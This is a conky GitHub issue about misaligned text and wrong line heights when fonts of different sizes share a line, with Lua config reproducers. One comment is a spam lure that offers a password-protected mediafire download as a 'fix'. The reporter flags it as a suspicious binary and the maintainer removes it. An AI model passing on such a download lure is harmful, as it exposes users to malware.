### ISSUE TITLE
[Bug]: Text alignment issues when using different font sizes on the same line

### ISSUE THREAD

**Issue by Tchou** [brndnmtthws/conky#2026] opened 2024-09-01 22:04 UTC
### What happened?

Conky version: 1.21.7
Backend: X11
Font engine: xft

While investigating why conky was truncating its content (last lines of text partially cut), I found out that it behaves randomly when using different font sizes on the same line. Note that even at the same pixelsize, some fonts may be higher than others. Also it is a common use case to have several fonts on the same line (e.g. using a symbolic font for icons and a regular one for text). A simple reproducer is the following one (note the two pixel sizes at the bottom of the config):
```lua
conky.config = {
    background = false,
    own_window = true,
    own_window_argb_visual = true,
    own_window_type = 'desktop',
    alignment = 'top_right',
    draw_outline = false,
    draw_shades = false,
    minimum_height = 1,
    minimum_width = 10,
    maximum_width = 4000,
    draw_borders = false,
    border_outer_margin = 0,
    border_inner_margin = 0,
    border_width = 0,
    use_xft = true,
    font = 'Hack:pixelsize=30',
    font0 = 'Helvetica:pixelsize=30'
}
conky.text = [[\
1 ${font}A${font0}B${font}C${font0}D${font}E
2 ${font}A${font0}B${font}C${font0}D${font}E
3 ${font}A${font0}B${font}C${font0}D${font}E
4 ${font}A${font0}B${font}C${font0}D${font}E]]
```
I expect conky to display 4 lines. Because the fontsizes are different, the text is misaligned and the text height computation is wrong.
![image](https://github.com/user-attachments/assets/bcdb0e4d-e878-43e5-a711-2157cd9a728b)

If we increase the `font0` size a bit, the errors seem to compensate somehow:
```
 font = 'Hack:pixelsize=30',
 font0 = 'Helvetica:pixelsize=40'
```
![image](https://github.com/user-attachments/assets/3104720a-d4ca-418d-851d-b3714af68fca)
The text is misaligned, but still stays within the computed line height, the the four lines appear. Changing the size so that `font` is larger is worse:
```
 font = 'Hack:pixelsize=40',
 font0 = 'Helvetica:pixelsize=30'
```
![image](https://github.com/user-attachments/assets/609c2d9f-1c78-4fb3-87c1-0077fa5f64a9)

I would expect the various texts to be aligned along their baseline.

### Version

1.21.7

### Which OS/distro are you seeing the problem on?

Ubuntu

### Conky config

```Lua
conky.config = {
    background = false,
    own_window = true,
    own_window_argb_visual = true,
    own_window_type = 'desktop',
    alignment = 'top_right',
    draw_outline = false,
    draw_shades = false,
    minimum_height = 1,
    minimum_width = 10,
    maximum_width = 4000,
    draw_borders = false,
    border_outer_margin = 0,
    border_inner_margin = 0,
    border_width = 0,
    use_xft = true,
    font = 'Hack:pixelsize=30',
    font0 = 'Helvetica:pixelsize=30'
}
conky.text = [[\
1 ${font}A${font0}B${font}C${font0}D${font}E
2 ${font}A${font0}B${font}C${font0}D${font}E
3 ${font}A${font0}B${font}C${font0}D${font}E
4 ${font}A${font0}B${font}C${font0}D${font}E]]
```

**Comment by goncastrum** [comment] 2024-09-01 22:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Tchou** [comment] 2024-09-01 23:11
To anyone reading this, the link points to a suspicious windows binary.
@brndnmtthws can you delete/hide the above comment ? I have already reported this user to GH.

**Comment by brndnmtthws** [comment] 2024-09-01 23:12
> To anyone reading this, the link points to a suspicious windows binary. @brndnmtthws can you delete/hide the above comment ? I have already reported this user to GH.

Weird, thanks. Comment deleted and that account has been blocked.

**Comment by Caellian** [comment] 2024-10-03 17:41
> I would expect the various texts to be aligned along their baseline.

Closing as duplicate of #976. Subscribe to that issue for updates.

**Closed by Caellian** 2024-10-03 17:41 UTC
Labels: bug, triage
